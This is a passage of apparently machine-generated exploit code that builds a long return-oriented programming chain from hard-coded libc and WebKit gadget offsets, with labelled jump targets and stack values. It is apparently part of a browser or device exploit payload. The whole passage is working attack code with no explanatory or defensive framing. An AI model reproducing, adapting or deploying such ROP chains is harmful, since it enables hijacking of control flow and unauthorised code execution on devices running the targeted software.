libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1385:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+119144, //L1386
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1386:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1388:
libc_base+144605, //pop rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+119280, //L1389
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1389:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1391:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+119400, //L1394
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+119384, //L1392
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1392:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1394:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+119544, //L1397
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+119512, //L1395
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+119528, //L1396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1395:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1396:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1397:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+119616, //L1399
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1399:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+119672, //L1400
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1400:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+119768, //L1403
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1402:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1403:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1404:
db([30, 0]); // 0x1e
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+119864, //L1405
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+119880, //L1406
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1405:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1406:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+119968, //L1408
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1408:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+120024, //L1409
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1409:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+120096, //L1412
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1412:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+120152, //L1413
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1413:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+120240, //L1415
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1415:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1417:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+120360, //L1420
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+120344, //L1418
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1418:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1420:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+120504, //L1423
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+120472, //L1421
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+120488, //L1422
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1421:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1422:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1423:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+120576, //L1425
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1425:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+120632, //L1426
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1426:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+120728, //L1429
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1428:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1429:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1430:
db([7, 0]); // 0x7
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+120824, //L1431
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+120840, //L1432
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1431:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1432:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+120928, //L1434
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1434:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+120984, //L1435
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1435:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+121088, //L1437
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1437:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1439:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+121208, //L1442
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+121192, //L1440
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1440:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1442:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+121352, //L1445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+121320, //L1443
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+121336, //L1444
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1443:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1444:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1445:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+121424, //L1447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1447:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+121480, //L1448
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1448:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+121576, //L1451
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1450:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1451:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1452:
db([31, 0]); // 0x1f
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+121672, //L1453
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+121688, //L1454
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1453:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1454:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+121776, //L1456
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1456:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+121832, //L1457
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1457:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+121904, //L1460
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1460:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+121960, //L1461
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1461:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1463:
libc_base+759608, //pop rax
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+122096, //L1464
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1464:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1466:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+122216, //L1469
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+122200, //L1467
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1467:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1469:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+122360, //L1472
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+122328, //L1470
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+122344, //L1471
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1470:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1471:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1472:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+122432, //L1474
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1474:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+122488, //L1475
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1475:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+122584, //L1478
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1477:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1478:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1479:
db([32, 0]); // 0x20
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+122680, //L1480
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+122696, //L1481
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1480:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1481:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+122784, //L1483
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1483:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+122840, //L1484
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1484:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+122912, //L1487
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1487:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+122968, //L1488
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1488:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+123056, //L1490
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1490:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1492:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+123176, //L1495
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+123160, //L1493
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1493:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1495:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+123320, //L1498
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+123288, //L1496
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+123304, //L1497
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1496:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1497:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1498:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+123392, //L1500
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1500:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+123448, //L1501
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1501:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+123544, //L1504
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1503:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1504:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1505:
db([37, 0]); // 0x25
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+123640, //L1506
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+123656, //L1507
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1506:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1507:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+123744, //L1509
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1509:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+123800, //L1510
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1510:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+123904, //L1512
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1512:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1514:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+124024, //L1517
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+124008, //L1515
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1515:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1517:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+124168, //L1520
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+124136, //L1518
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+124152, //L1519
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1518:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L1519:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1520:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+124240, //L1522
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1522:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+124296, //L1523
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1523:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+124392, //L1526
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1525:
db([8, 0]); // 0x8
set_gadget(webkit_base+3236123,); //pop r9
//L1526:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1527:
db([33, 0]); // 0x21
set_gadgets([
webkit_base+10973692, //imul rax, rcx
libc_base+764760, //pop rsi
ropchain+124488, //L1528
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+124504, //L1529
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L1528:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L1529:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+124592, //L1531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1531:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+124648, //L1532
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1532:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+124720, //L1535
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1535:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+124776, //L1536
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L1536:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+20307877, //mov [rax], rcx
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
//L1538:
libc_base+426295, //mov [rdi], rax
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+124912, //L1539
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L1539:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L1541:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
